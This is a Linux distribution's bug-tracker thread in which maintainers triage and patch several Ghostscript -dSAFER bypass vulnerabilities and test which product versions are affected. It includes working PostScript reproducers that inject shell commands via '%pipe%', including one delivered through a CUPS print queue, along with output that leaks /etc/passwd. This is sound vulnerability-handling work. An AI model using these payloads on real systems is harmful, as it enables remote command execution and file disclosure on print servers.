bugbot adjusting priority

It seems currently Google verifies in general
to what extent -dSAFER works in Ghostscript.

Up to now I noticed the foollowing other issues that are
about or related to 'SAFER' at Ghostscript upstream:

http://bugs.ghostscript.com/show_bug.cgi?id=697178

http://bugs.ghostscript.com/show_bug.cgi?id=697179

http://bugs.ghostscript.com/show_bug.cgi?id=697189

http://bugs.ghostscript.com/show_bug.cgi?id=697190

In general look for bug reports from taviso@google.com
at the Ghostscript upstream bugzilla.

Probably more such issues will appear in the near future.

I would like to wait until all the -dSAFER issues
are fixed at upstream Ghostscript and then do a
maintenance update of our RPM packages.

security-team,
could you get in contact with taviso@google.com
to establish a direct communication?

(In reply to Johannes Meixner from comment #2)
CVEs got assigned 
CVE-2016-7976: http://bugs.ghostscript.com/show_bug.cgi?id=697178
CVE-2016-7977: http://bugs.ghostscript.com/show_bug.cgi?id=697169
CVE-2016-7978: http://bugs.ghostscript.com/show_bug.cgi?id=697179
CVE-2016-7979: http://bugs.ghostscript.com/show_bug.cgi?id=697190

Do you want individual bugs for these or do you want to track them in this bug?

As for Tavis: Any special questions you have for him? He's working with upstream and is posting about it on OSS, which we will transfer here.

I would prefer one singel bug report (this one) because
I would like to fix all the -dSAFER issues altogether.

I have no special questions for Tavis.
My only intent was that you and he work together.


By the way:
One more Ghostscript upstream -dSAFER related issue:
http://bugs.ghostscript.com/show_bug.cgi?id=697193

(In reply to Johannes Meixner from comment #5)
Yes, probably a good idea. Since there's no rush to submit here I would suggest waiting until next weeks to see what develops. A lot of people a currently looking into this.

More details for the issues mentioned above:
CVE-2016-7976: Various userparams allow %pipe% in paths, allowing remote shell command execution.
       Bug: http://bugs.ghostscript.com/show_bug.cgi?id=697178
Reproducer: http://www.openwall.com/lists/oss-security/2016/09/30/8
     Patch: http://git.ghostscript.com/?p=user/chrisl/ghostpdl.git;h=71ac87493b1e445d6c07554d4246cf7d4f44875c

CVE-2016-7977: .libfile doesn't check PermitFileReading array, allowing remote file disclosure.
       Bug: http://bugs.ghostscript.com/show_bug.cgi?id=697169
Reproducer: http://www.openwall.com/lists/oss-security/2016/09/29/28
     Patch: http://git.ghostscript.com/?p=user/chrisl/ghostpdl.git;h=cf046d2f0fa2c6973c6ca8d582a9b185cc4bd280

CVE-2016-7978: Reference leak in .setdevice allows use-after-free and remote code execution
       Bug: http://bugs.ghostscript.com/show_bug.cgi?id=697179
Reproducer: http://bugs.ghostscript.com/show_bug.cgi?id=697179#c0
     Patch: http://git.ghostscript.com/?p=user/chrisl/ghostpdl.git;h=d5ad1e0298e1c193087c824eb4f79628b182e28b

Use CVE-2016-7979: Type confusion in .initialize_dsc_parser allows remote code execution
       Bug: http://bugs.ghostscript.com/show_bug.cgi?id=697190
Reproducer: http://bugs.ghostscript.com/show_bug.cgi?id=697190#c0
     Patch: http://git.ghostscript.com/?p=ghostpdl.git;h=875a0095f37626a721c7ff57d606a0f95af03913

Will hand this over to EMU as highly visible issue

Johannes Meixner if you can commit wherever you get to, to obs when you finish for today and link it here i'll branch your packages and continue working on them Monday Morning Australian time, I'll also do any patches that come in over the weekend.

Also have you used quilt before? If you haven't it will make working on packages like SLE-11 much easier, if you haven't used it i'm sure one of us can give you some pointers.

Currently I am working with newest Ghostscript 9.20
from the OBS "Printing" project on a Leap 42.1 system.

I got the first ready-to-use reproducer for
http://bugs.ghostscript.com/show_bug.cgi?id=697178

Even with -dSAFER it runs the command "head -n3 /etc/passwd"
and sends its output to the terminal (/dev/tty):
---------------------------------------------------------------------------
# cat gs_bug697178_reproducer1.ps
%!PS
currentdevice
null
true
mark
/OutputICCProfile
(%pipe%head -n3 /etc/passwd > /dev/tty)
.putdeviceparams
quit

# gsparams="-q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage"

# gs $gsparams gs_bug697178_reproducer1.ps
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
avahi:x:486:484:User for Avahi:/run/avahi-daemon:/bin/false
bin:x:1:1:bin:/bin:/bin/bash
+ ./base/gsicc_manage.c:1713: gsicc_set_device_profile(): Creation of ICC profile failed
---------------------------------------------------------------------------

In general regarding -dSAFER see
http://www.ghostscript.com/doc/9.20/Language.htm
(excerpt)
---------------------------------------------------------------------------
PermitFileReading <array of strings>
PermitFileWriting <array of strings>
PermitFileControl <array of strings>
...
The SAFER [ http://www.ghostscript.com/doc/9.20/Use.htm#Safer ] mode
and the .setsafe operator set all three lists to empty arrays,
thus the only files that can be read are the %stdin device and
on LIBPATH or FONTPATH or the Resource paths specified by
the /FontResourceDir or /GenericResourceDir system params.
Files cannot be opened for writing anywhere and cannot be deleted
or renamed except for files created with the .tempfile operator). 
---------------------------------------------------------------------------
where
http://www.ghostscript.com/doc/9.20/Use.htm#Safer
reads (excerpt)
---------------------------------------------------------------------------
-dSAFER
    Disables the deletefile and renamefile operators, and the ability
    to open piped commands (%pipe%cmd) ...
---------------------------------------------------------------------------

Typo correction for commemnt#10:
The gs call needs -dSAFER as follows:
---------------------------------------------------------------------------
# gsparams="-q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage"

# gs $gsparams -dSAFER gs_bug697178_reproducer1.ps
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
avahi:x:486:484:User for Avahi:/run/avahi-daemon:/bin/false
bin:x:1:1:bin:/bin:/bin/bash
+ ./base/gsicc_manage.c:1713: gsicc_set_device_profile(): Creation of ICC profile failed
---------------------------------------------------------------------------


Furthermore -dPARANOIDSAFER as used by the printing system filters
(the programs in /usr/lib/cups/filter/) does not make a difference:
---------------------------------------------------------------------------
gs $gsparams -dPARANOIDSAFER gs_bug697178_reproducer1.ps
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
avahi:x:486:484:User for Avahi:/run/avahi-daemon:/bin/false
bin:x:1:1:bin:/bin:/bin/bash
+ ./base/gsicc_manage.c:1713: gsicc_set_device_profile(): Creation of ICC profile failed
---------------------------------------------------------------------------

This means when printing a specially crafted PostScript file
shell commands execution as the user 'lp' is possible
(fortunately 'lp' is not allowed to do mauch - but it can
at least read all other print job data files):
---------------------------------------------------------------------------
%!PS
currentdevice
null
true
mark
/OutputICCProfile
(%pipe%head -n3 /etc/passwd > /tmp/gs_bug697178_printing_reproducer1.out)
.putdeviceparams
currentdevice
null
true
mark
/OutputICCProfile
(%pipe%chmod a+rwx /tmp/gs_bug697178_printing_reproducer1.out)
.putdeviceparams
quit

# lpadmin -p testq -v file:/dev/null \
 -P /usr/share/cups/model/OpenPrintingPPDs/ghostscript/Generic-PCL_5e_Printer.ljet4.ppd.gz \
 -E

# lp -d testq gs_bug697178_printing_reproducer1.ps
request id is testq-8415 (1 file(s))

# ls -l /tmp/gs_bug697178_printing_reproducer1.out
-rwxrwxrwx 1 lp lp ... /tmp/gs_bug697178_printing_reproducer1.out

# cat /tmp/gs_bug697178_printing_reproducer1.out
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
avahi:x:486:484:User for Avahi:/run/avahi-daemon:/bin/false
bin:x:1:1:bin:/bin:/bin/bash
---------------------------------------------------------------------------

gs_bug697178_reproducer1.ps does not work
for Ghostscript 9.15 on SLES12:
-----------------------------------------------------------------------------
# cat /etc/issue
Welcome to SUSE Linux Enterprise Server 12 SP2 RC2 (x86_64)

# gsparams="-q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage"

# gs $gsparams -dSAFER gs_bug697178_reproducer1.ps
sfopen: gs_parse_file_name failed.
  ./base/gsicc_manage.c:1084: gsicc_open_search():
 Could not find %pipe%head -n3 /etc/passwd > /dev/tty 
| ./base/gsicc_manage.c:1685: gsicc_set_device_profile():
 cannot find device profile
-----------------------------------------------------------------------------

This could be good news but it also does not work without -dSAFER
-----------------------------------------------------------------------------
# gs $gsparams gs_bug697178_reproducer1.ps
sfopen: gs_parse_file_name failed.
  ./base/gsicc_manage.c:1084: gsicc_open_search():
 Could not find %pipe%head -n3 /etc/passwd > /dev/tty 
| ./base/gsicc_manage.c:1685: gsicc_set_device_profile():
 cannot find device profile
-----------------------------------------------------------------------------
which could indicate that it is not -dSAFER that prohibits it
but another reason why it does not work on Ghostscript 9.15.

I am not at all a sufficient PostScript expert to create
PostScript code that actually proves Ghostscript 9.15 is secure.

gs_bug697178_reproducer1.ps does not work
for Ghostscript 8.62 on SLES11:
---------------------------------------------------------------------------
# cat /etc/issue
Welcome to SUSE Linux Enterprise Server 11 SP4  (x86_64)

# gsparams="-q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage"

# gs $gsparams -dSAFER gs_bug697178_reproducer1.ps
[no output]

# gs $gsparams gs_bug697178_reproducer1.ps
[no output]
---------------------------------------------------------------------------
Again: That it also does not work without -dSAFER may indicate
that it is not -dSAFER that prohibits it but another reason
why it does not work with Ghostscript 8.62.

Created attachment 696404 [details]
gs -q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage -dSAFER gs_bug694724_reproducer1.ps

Created attachment 696407 [details]
gs -q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage -dSAFER gs_bug697169_reproducer1.ps

I would appreciate any help when there are PostScript experts
and - even more important - Ghostscript experts out there
 (as far as I know '.putdeviceparams' is not a generic
  PostScript language command and '%pipe%' is certainly
  something Ghostscript specific)
who could help to create generally working reproducers that
can prove also on older Ghostscript versions whether or not
'-dSAFER' works as it should for each of the various issues.

Created attachment 696408 [details]
gs -q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage -dSAFER gs_bug697178_reproducer1.ps

Created attachment 696413 [details]
gs -q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage -dSAFER gs_osssec_2016_q3_651.ps

SLES10-SP3 is not vulnerable to gs_osssec_2016_q3_651.ps:

 | $ gs -q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage -dSAFER gs_osssec_2016_q3_651.ps 
 | /etc/passwd
 | stat succeeded
 |  ctime:1322337369 atime:1322337367 size:1117 blocks:8
 |
 | ERROR: /invalidfileaccess in --.libfile--
 | Operand stack:
 |    (/etc/passwd)
 | Execution stack:
 |    %interp_exit   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   --nostringval--   --nostringval--   false   1   %stopped_push   1   3   %oparray_pop   1   3   %oparray_pop   1   3   %oparray_pop   1   3   %oparray_pop   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   (gx_io_device)   0   (/etc/passwd\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000...)   (file_enum)   --nostringval--   %file_continue   --nostringval--
 | Dictionary stack:
 |    --dict:1135/3371(ro)(G)--   --dict:0/20(G)--   --dict:103/200(L)--
 | Current allocation mode is local
 | Current file position is 898
 | ESP Ghostscript 8.15.3: Unrecoverable error, exit code 1

SLES11-SP1 is vulnerable to gs_osssec_2016_q3_651.ps:

 | $ gs -q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage -dSAFER gs_osssec_2016_q3_651.ps 
 | /etc/passwd.old
 | stat succeeded
 |  ctime:1433341699 atime:1346205226 size:1353 blocks:8
 | 
 | .libfile returned file
 | 
 | at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
 | bin:x:1
 | /etc/passwd
 | stat succeeded
 |  ctime:1433341699 atime:1433341690 size:1353 blocks:8
 | 
 | .libfile returned file
 | 
 | at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
 | bin:x:1
 | /etc/passwd.YaST2save
 | stat succeeded
 |  ctime:1303828902 atime:1303828902 size:1253 blocks:8
 | 
 | .libfile returned file
 | 
 | root:x:0:0:root:/root:/bin/bash
 | bin:x:1:1:bin:/bin:/bin/bash

SLES12 is not vulnerable to gs_osssec_2016_q3_651.ps:

 | $ gs -q -r50 -dNOPAUSE -dBATCH -sDEVICE=nullpage -dSAFER gs_osssec_2016_q3_651.ps 
 | /etc/passwd-
 | stat succeeded
 |  ctime:1421179022 atime:1421179022 size:1462 blocks:8
 | 
 | Error: /invalidfileaccess in --.libfile--
 | Operand stack:
 |    (/etc/passwd-)
 | Execution stack:
 |    %interp_exit   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   --nostringval--   --nostringval--   false   1   %stopped_push   1951   1   3   %oparray_pop   1950   1   3   %oparray_pop   1934   1   3   %oparray_pop   1820   1   3   %oparray_pop   --nostringval--   %errorexec_pop   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   (gx_io_device)   0   (/etc/passwd-\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000...)   (file_enum)   --nostringval--   %file_continue   --nostringval--
 | Dictionary stack:
 |    --dict:1179/1684(ro)(G)--   --dict:0/20(G)--   --dict:78/200(L)--
 | Current allocation mode is local
 | Current file position is 898
 | GPL Ghostscript 9.15: Unrecoverable error, exit code 1

Improved reproducer for CVE-2016-7977 by Florian Weimer
It still tries to open a file in earlier versions, with directory
traversal:

[pid 29607] open("/usr/share/ghostscript/9.06/iccprofiles/../../../../../etc/passwd", O_RDONLY) = 5

The %pipe%-based execution was introduced as a side effect of:

commit 1fae53a708fca6c2ac0417bc23f5d095cc379250
Author: Chris Liddell <chris.liddell@artifex.com>
Date:   Thu Jul 30 17:27:23 2015 +0100

    Bug 696101: fix uses of the sfopen API.

    The stream API in GS is defined as *always* opening files in
    binary mode, where applicable, so there is no need for the API
    clients to specify binary mode.

    This is previously been benign, and thus ignored, but reportedly
    ending up with a duplicate 'b' character in the mode causes a
    crash on Windows 10.

    No cluster differences.


It was not visible before because 'b' in the mode argument to popen
causes glibc's popen to fail.  This is highly non-portable.  Earlier
versions on different libcs are likely have to code execution, too.

=================

Didn't work for me on Leap 42.1 though, which I would have suspected

CVE-2016-7978 (ghostscript bug 697179) doesn't affect ghostscript 8.x (SLE-11 and below).
The icc_array/icc_struct member which is used after being freed was added during the device profile handling rewrite in the 9.x branch.
(In commit http://git.ghostscript.com/?p=ghostpdl.git;h=b1d311f06250a07d4c360e67369980d199722694)

(In reply to Johannes Segitz from comment #26)
> The %pipe%-based execution was introduced as a side effect of:
> commit 1fae53a708fca6c2ac0417bc23f5d095cc379250
I can confirm that. SLE-12 patched with 1fae53a708fca6c2ac0417bc23f5d095cc379250 shows the vulnerable behavior, without this commit (current state) it does not.

A side note for completeness:

I agree with having the -dSAFER behaviour by default
(and use -dNOSAFER if needed to switch it off - see "man gs")
as requested by Marcus Meissner at upstream
http://bugs.ghostscript.com/show_bug.cgi?id=697202

But it cannot be "simply changed" without causing regressions.
It would break documented default PostScript behaviour because
PostScript is a complete programming language.
Think about having such a SAFER behaviour by default for any
other programming language (e.g. C, Perl, Python, Ruby,...).

FYI, see also what I wrote in the section about
"It is crucial to limit access to CUPS to trusted users" in
https://en.opensuse.org/SDB:CUPS_and_SANE_Firewall_settings

EMU team is done here, now we need to check SLE 10 SP3

SUSE-SU-2016:2492-1: An update that fixes three vulnerabilities is now available.

Category: security (important)
Bug References: 1001951
CVE References: CVE-2013-5653,CVE-2016-7978,CVE-2016-7979
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    ghostscript-9.15-11.1
SUSE Linux Enterprise Server for SAP 12 (src):    ghostscript-9.15-11.1
SUSE Linux Enterprise Server 12-SP1 (src):    ghostscript-9.15-11.1
SUSE Linux Enterprise Server 12-LTSS (src):    ghostscript-9.15-11.1
SUSE Linux Enterprise Desktop 12-SP1 (src):    ghostscript-9.15-11.1

SUSE-SU-2016:2493-1: An update that fixes four vulnerabilities is now available.

Category: security (important)
Bug References: 1001951,939342
CVE References: CVE-2013-5653,CVE-2015-3228,CVE-2016-7977,CVE-2016-7979
Sources used:
SUSE OpenStack Cloud 5 (src):    ghostscript-library-8.62-32.38.1
SUSE Manager Proxy 2.1 (src):    ghostscript-library-8.62-32.38.1
SUSE Manager 2.1 (src):    ghostscript-library-8.62-32.38.1
SUSE Linux Enterprise Software Development Kit 11-SP4 (src):    ghostscript-library-8.62-32.38.1
SUSE Linux Enterprise Server 11-SP4 (src):    ghostscript-library-8.62-32.38.1
SUSE Linux Enterprise Server 11-SP3-LTSS (src):    ghostscript-library-8.62-32.38.1
SUSE Linux Enterprise Server 11-SP2-LTSS (src):    ghostscript-library-8.62-32.38.1
SUSE Linux Enterprise Point of Sale 11-SP3 (src):    ghostscript-library-8.62-32.38.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    ghostscript-library-8.62-32.38.1
SUSE Linux Enterprise Debuginfo 11-SP3 (src):    ghostscript-library-8.62-32.38.1
SUSE Linux Enterprise Debuginfo 11-SP2 (src):    ghostscript-library-8.62-32.38.1

And it continues:

CVE-2016-8602: Tavis Ormandy 
    Here is a different type confusion bug, originally I thought it was
    just a NULL dereference, but after seeing the patch it does look
    exploitable.

    id: http://bugs.ghostscript.com/show_bug.cgi?id=697203
    patch: http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=f5c7555c30393e64ec1f5ab0dfae5b55b3b3fc78
    repro: clear 16#41414141 .sethalftone5

(In reply to Johannes Segitz from comment #46)
I'll open an new bug for CVE-2016-8602, handling this all in one bug becomes unwieldy

Created attachment 696992 [details]
Latest gstest.sh to test Ghostscript on SLE12, SLE11, SLE10

As far as I understand it the issue is now fixed
for all maintained SLE products.

Now the fixes for openSUSE...

(In reply to Johannes Meixner from comment #60)
> As far as I understand it the issue is now fixed
> for all maintained SLE products.
> 
> Now the fixes for openSUSE...

Leap should be already done as in this case it takes fixes from SLE-12 so its just 13.2 and Tumbleweed

Submitted to "Printing" => openSUSE:Factory => Tumbleweed:
----------------------------------------------------------------------------
$ osc request accept -m 'Ghostscript security update that fixes
 (CVE-2013-5653 is already fixed in the 9.20 sources)
 CVE-2016-7976 CVE-2016-7977 CVE-2016-7978 CVE-2016-7979 (all bsc#1001951)
 and CVE-2016-8602 (bsc#1004237)' 435738                                                    
Result of change request state: ok
openSUSE:Factory 
Forward this submit to it? ([y]/n)y
There are already the following submit request: 346383, 429441.
Supersede the old requests? (y/n/c) y
Ghostscript security update that fixes
 (CVE-2013-5653 is already fixed in the 9.20 sources)
 CVE-2016-7976 CVE-2016-7977 CVE-2016-7978 CVE-2016-7979 (all bsc#1001951)
 and CVE-2016-8602 (bsc#1004237) (forwarded request 435738 from jsmeix)
New request # 435739
----------------------------------------------------------------------------

This is an autogenerated message for OBS integration:
This bug (1001951) was mentioned in
https://build.opensuse.org/request/show/435739 Factory / ghostscript

Fixed for openSUSE 13.2:
-----------------------------------------------------------------------------
$ osc branch -M openSUSE:13.2 ghostscript

...


$ osc mr -m 'Ghostscript security update that fixes
 CVE-2013-5653 CVE-2016-7978 CVE-2016-7979 (all bsc#1001951)
 and CVE-2016-8602 (bsc#1004237)'
 home:jsmeix:branches:openSUSE:13.2:Update ghostscript.openSUSE_13.2_Update
 openSUSE:13.2:Update            
Using target project 'openSUSE:Maintenance'
436173
-----------------------------------------------------------------------------

Note:
Ghostscript 9.15 on openSUSE 13.2 seems to be
not affected by CVE-2016-7976 and CVE-2016-7977
because their reproducers do not succeed there.

According to comment#62 the issue is now fixed
for all maintaines SLE and openSUSE products.

This is an autogenerated message for OBS integration:
This bug (1001951) was mentioned in
https://build.opensuse.org/request/show/436173 13.2 / ghostscript

openSUSE-SU-2016:2574-1: An update that fixes three vulnerabilities is now available.

Category: security (important)
Bug References: 1001951
CVE References: CVE-2013-5653,CVE-2016-7978,CVE-2016-7979
Sources used:
openSUSE Leap 42.1 (src):    ghostscript-9.15-8.1, ghostscript-mini-9.15-8.1

An update workflow for this issue was started.
This issue was rated as moderate.
Please submit fixed packages until 2016-11-09.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/63157

openSUSE-SU-2016:2648-1: An update that fixes four vulnerabilities is now available.

Category: security (important)
Bug References: 1001951,1004237
CVE References: CVE-2013-5653,CVE-2016-7978,CVE-2016-7979,CVE-2016-8602
Sources used:
openSUSE 13.2 (src):    ghostscript-9.15-6.1, ghostscript-mini-9.15-6.1

released